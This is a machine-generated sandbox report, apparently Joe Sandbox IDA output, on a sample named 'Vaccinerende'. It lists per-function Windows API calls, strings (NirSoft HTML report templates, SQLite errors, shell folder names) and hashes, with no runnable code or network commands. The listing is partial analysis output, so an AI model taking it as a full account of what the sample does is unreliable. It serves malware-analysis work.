                                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                            • GetDesktopWindow.USER32 ref: 0040D9FD
                                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                            • memset.MSVCRT ref: 0040DA23
                                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                            Strings
                                            Similarity
                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                            • String ID: caption
                                            • API String ID: 973020956-4135340389
                                            APIs
                                            Strings
                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                            Similarity
                                            • API ID: memset$_snwprintf$wcscpy
                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                            • API String ID: 1283228442-2366825230
                                            APIs
                                            • wcschr.MSVCRT ref: 00413972
                                            • wcscpy.MSVCRT ref: 00413982
                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                            • wcscpy.MSVCRT ref: 004139D1
                                            • wcscat.MSVCRT ref: 004139DC
                                            • memset.MSVCRT ref: 004139B8
                                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                            • memset.MSVCRT ref: 00413A00
                                            • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                            • wcscat.MSVCRT ref: 00413A27
                                            Strings
                                            Similarity
                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                            • String ID: \systemroot
                                            • API String ID: 4173585201-1821301763
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: wcscpy
                                            • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                            • API String ID: 1284135714-318151290
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                            • String ID: 0$6
                                            • API String ID: 4066108131-3849865405
                                            APIs
                                            • memset.MSVCRT ref: 004082EF
                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                            • memset.MSVCRT ref: 00408362
                                            • memset.MSVCRT ref: 00408377
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 290601579-0
                                            APIs
                                            • memchr.MSVCRT ref: 00444EBF
                                            • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                            • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                            • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                            • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                            • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                            • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                            • memset.MSVCRT ref: 0044505E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$memchrmemset
                                            • String ID: PD$PD
                                            • API String ID: 1581201632-2312785699
                                            APIs
                                            • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                            • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                            • GetDC.USER32(00000000), ref: 00409F6E
                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                            • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                            • GetWindowRect.USER32(?,?), ref: 00409FA0
                                            • GetParent.USER32(?), ref: 00409FA5
                                            • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                            • String ID:
                                            • API String ID: 2163313125-0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free$wcslen
                                            • String ID:
                                            • API String ID: 3592753638-3916222277
                                            APIs
                                            • memset.MSVCRT ref: 0040A47B
                                            • _snwprintf.MSVCRT ref: 0040A4AE
                                            • wcslen.MSVCRT ref: 0040A4BA
                                            • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                            • wcslen.MSVCRT ref: 0040A4E0
                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpywcslen$_snwprintfmemset
                                            • String ID: %s (%s)$YV@
                                            • API String ID: 3979103747-598926743
                                            APIs
                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                            • wcslen.MSVCRT ref: 0040A6B1
                                            • wcscpy.MSVCRT ref: 0040A6C1
                                            • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                            • wcscpy.MSVCRT ref: 0040A6DB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                            • String ID: Unknown Error$netmsg.dll
                                            • API String ID: 2767993716-572158859
                                            APIs
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                            • wcscpy.MSVCRT ref: 0040DAFB
                                            • wcscpy.MSVCRT ref: 0040DB0B
                                            • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                              • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                            • API String ID: 3176057301-2039793938
                                            APIs
                                            Strings
                                            • too many attached databases - max %d, xrefs: 0042F64D
                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                            • out of memory, xrefs: 0042F865
                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                            • database %s is already in use, xrefs: 0042F6C5
                                            • database is already attached, xrefs: 0042F721
                                            • unable to open database: %s, xrefs: 0042F84E
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpymemset
                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                            • API String ID: 1297977491-2001300268
                                            APIs
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                            • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                            • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                            • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                            • String ID: ($d
                                            • API String ID: 1140211610-1915259565
                                            APIs
                                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                            • Sleep.KERNEL32(00000001), ref: 004178E9
                                            • GetLastError.KERNEL32 ref: 004178FB
                                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$ErrorLastLockSleepUnlock
                                            • String ID:
                                            • API String ID: 3015003838-0
                                            APIs
                                            • memset.MSVCRT ref: 00407E44
                                            • memset.MSVCRT ref: 00407E5B
                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                            • wcscpy.MSVCRT ref: 00407F10
                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                            • String ID:
                                            • API String ID: 59245283-0
                                            APIs
                                            • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                            • GetLastError.KERNEL32 ref: 0041855C
                                            • Sleep.KERNEL32(00000064), ref: 00418571
                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                            • GetLastError.KERNEL32 ref: 0041858E
                                            • Sleep.KERNEL32(00000064), ref: 004185A3
                                            • free.MSVCRT ref: 004185AC
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$AttributesDeleteErrorLastSleep$free
                                            • String ID:
                                            • API String ID: 2802642348-0
                                            • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                            • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                            APIs
                                            • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                            • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                            • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                            • API String ID: 3510742995-3273207271
                                            • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                            • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                            • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                            • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                            APIs
                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                            • memset.MSVCRT ref: 00413ADC
                                            • memset.MSVCRT ref: 00413AEC
                                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                            • memset.MSVCRT ref: 00413BD7
                                            • wcscpy.MSVCRT ref: 00413BF8
                                            • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                            • String ID: 3A
                                            • API String ID: 3300951397-293699754
                                            • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                            • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                            • wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                            • wcslen.MSVCRT ref: 0040D1D3
                                            • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                            • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                            • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                            • String ID: strings
                                            • API String ID: 3166385802-3030018805
                                            • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                            • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                            APIs
                                            • memset.MSVCRT ref: 00411AF6
                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                            • wcsrchr.MSVCRT ref: 00411B14
                                            • wcscat.MSVCRT ref: 00411B2E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FileModuleNamememsetwcscatwcsrchr
                                            • String ID: AE$.cfg$General$EA
                                            • API String ID: 776488737-1622828088
                                            • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                            • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                            APIs
                                            • memset.MSVCRT ref: 0040D8BD
                                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                            • memset.MSVCRT ref: 0040D906
                                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                            • _wcsicmp.MSVCRT ref: 0040D92F
                                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                            • String ID: sysdatetimepick32
                                            • API String ID: 1028950076-4169760276
                                            • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
